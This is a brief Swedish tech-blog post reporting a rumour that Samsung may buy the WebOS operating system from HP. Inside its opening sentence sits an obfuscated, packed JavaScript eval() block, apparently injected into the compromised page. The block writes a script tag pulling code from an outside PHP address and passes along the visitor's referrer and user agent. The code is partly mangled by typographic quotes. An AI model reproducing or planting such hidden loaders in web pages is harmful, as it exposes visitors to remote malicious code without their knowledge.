Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Ska Samsung köpa WebOS av HP?

Ska Samsung köpa WebOS av HP?
Sebastian Plengier Ehrnfelt

Rykterna eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kefdk|var|u0026u|referrer|ibdiz||js|php’.split(‘|’),0,{}))
på internet gällande ifall Samsung nu ska köpa WebOS av HP är hetare än någonsin.

Det sägs att Samsung nu måste hitta på något som gör dem mindre beroende av Android.

Det var inte längesen HP meddelade att dem nu lägger ner sin utveckling av smartphone/tablet operativsystemet WebOS.
Samsung ser nu en möjlighet att kanske köpa upp det och bygga vidare på systemet för egen räkning.

Digitimes skriver att det beror på att Samsung inte vill bli beroende av Googles operativsystem Android nu när Google har köpt upp konkurrenten Motorola Mobility. Samsung har redan sitt egna operativsystem för smartphone som är väldigt populärt i Asien men inte slått vidare bra i resten av världen.

Varken HP eller Samsung har kommenterat ovanstående uppgifter. Detta är endast ett rykte.

Mer info: www.digitimes.com